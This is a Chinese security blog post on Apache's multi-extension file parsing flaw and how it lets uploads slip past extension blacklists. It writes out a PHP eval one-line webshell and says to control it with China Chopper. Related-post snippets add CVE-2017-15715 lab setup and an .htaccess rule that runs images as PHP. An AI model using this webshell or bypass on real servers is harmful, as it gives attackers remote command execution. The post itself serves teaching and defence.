Apache文件解析漏洞

最新推荐文章于 2024-04-19 20:51:17 发布
最新推荐文章于 2024-04-19 20:51:17 发布
阅读量634 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_25899635/article/details/90416214
本文介绍了Apache和php采用module方式结合时存在的文件解析漏洞。因Apache认为文件可有多扩展名,从左到右判断解析方法。在Web程序有文件上传且有黑名单验证时,可利用此漏洞上传Webshell到目标服务器,如上传一句话代码并用中国菜刀连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Apache环境
当Apache和php采用module的方式结合的时候存在文件解析漏洞
在这里插入图片描述
Apache解析漏洞介绍
因为Apache认为一个文件可以拥有多个扩展名,哪怕没有文件名,也可以拥有多个扩展名。Apache认为应该从左到右开始判断解析方法的。如果最右侧的扩展名为不可识别的,就继续往左判断,直到判断到文件名为止。
官方解释:http://httpd.apache.org/docs/current/mod/directive-dict.html
在这里插入图片描述
利用场景介绍
在Web程序中存在文件上传,但是有黑名单验证时,利用该解析漏洞可以上传对应的Webshell到目标服务器。
上传一句话 <?php @eval($_POST["cmd"]);?>用中国菜刀连接。

Web安全—文件上传(解析漏洞
zhdf160916的博客
11-21 8188
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传:文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1905
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
Apache解析漏洞
m0_57379855的博客
04-17 2309
Apache解析漏洞Apache解析漏洞举例Apache 解析漏洞(CVE-2017-15715)环境准备安装docker下载CVE-2017-15715 Apache解析漏洞 Apache文件解析漏洞与用户的配置有密切关系。严格来说,属于用户配置问题,其实apache本身根本不存在所谓 的解析漏洞Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别(不在mime.types内),则继续向左识别。 当我们请求这样一个文件:1.php.aaa aaa ->无法识别,向左 php -
中间件安全—Apache常见漏洞
Karka_的博客
03-20 1337
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞-01 Apache文件解析漏洞是一种基于Apache服务器文件解析机制中的漏洞,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,导致服务器错误地解析文件类型,从而导致安全漏洞的出现。 Apache...
apache文件解析漏洞
xdjxi的博客
03-07 552
.使用Docker搭建环境 1.首先拉取一个基础镜像 docker pull ubuntu:18.04 启动一个容器 docker run --name apachejs -itd -p 80:80 ubuntu:18.04 进入容器 docker exec -it apachejs bash 更换apt源 echo "deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe mul...
Apache 文件解析漏洞
最新发布
03-22
好的,我现在需要处理用户关于Apache文件解析漏洞CVE-2017-15715的修复方案的询问。首先,我需要回顾用户提供的引用内容,确保准确理解漏洞的成因和现有信息。 根据引用[1]和[2],这个漏洞主要涉及Apache HTTPD ...
【linux】 apache多后缀文件解析漏洞复现
2401_83817843的博客
04-19 884
由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。还是可以解析,证明不管php是不是在最后面,哪怕在中间,也能被解析
apache解析漏洞上传shell
A_dmin的博客
09-15 2271
apache解析漏洞上传shell 实验概述   Apache HTTP Server(简称 Apache) 是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中;本实验通过对apache服务器的测试,判断是否存在...
Apache 漏洞之后缀名解析漏洞
热门推荐
04-28 1万+
我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件不管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为windows2003+iis6.0目录解析漏洞。但是大家可能不知道的是,apache服务器存在类似的解析漏洞我们来做下实验,我在本地搭建好了一个apache+php的测试平台两个文件phpinfo.php  ph
7z apache解析漏洞_渗透测试之文件上传漏洞和任意文件下载
weixin_39930252的博客
12-22 288
文件上传漏洞类型分类如何判断上传漏洞类型?本次实现使用的靶场系统是upload-labs upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。任务1:查看下源码 只在js里添加了几个白名单 后端没有任何过滤第一关只有前端用JavaScript过滤 ...
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3658
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Apache文件解析漏洞详解
nuanyangH的博客
04-22 2062
1. Apache介绍与服务搭建 1.1. apache介绍 Apache跨平台的纯粹的web服务器,负责接收处理/响应http请求,之所以说它是纯粹的web服务器,是因为apache对于html页面的解析能力很强,但是不能解析嵌入页面内的服务器端脚本代码(如jsp/servlet)。 前面也说了,apache没有办法解析服务器端的脚本代码(此处以php为例),若需要解析.php文件,还需要php...
Apache默认解析后缀
m0_49025459的博客
04-25 1694
Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞Apache文件后缀名的识别是从后向前进行匹配的,以单个.作为分隔符。当遇到未知的文件后缀名时,会继续向前匹配,直到遇到可以识别的后缀名为止。apache配置文件,禁止.php.这样的文件执行,配置文件里面加入。
Jsp解析
U2133048的博客
11-13 725
JSP起源 在很多动态网页中,绝大部分内容都是固定不变的,只有局部内容需要动态产生和改变。 如果使用Servlet程序来输出只有局部内容需要动态改变的网页,其中所有的静态内容也需要程序员用Java程序代码产生,整个Servlet程序的代码将非常臃肿,编写和维护都将非常困难。 对大量静态内容的美工设计和相关HTML语句的编写,并不是程序员所要做的工作,程序员对此也不一定在行。网页美工设计和制作人员不懂Java编程,更是无法来完成这样的工作。 为了弥补Servlet的缺陷,SUN公司在Servl...
生命在于学习——文件解析
易水哲的博客
08-26 1500
文件解析漏洞
Apache里如何将图片解析成PHP
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-15 2950
首先,如果没有安装PHP,先安装PHP yum install -y php 然后进入网站根目录,如果不记得网站根目录,可以去配置文件里找 我的是/mnt/z 所以进入这个目录下,新建一个i.jpg文件 在浏览器里查看这个文件存在错误 接下来新建一个名为 .htaccess 的文件文件里面添加以下内容 这个 i.jpg 就是上面新建的图片 <FilesMatch "i.jpg"> SetHandler application/x-httpd-php </FilesMat
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值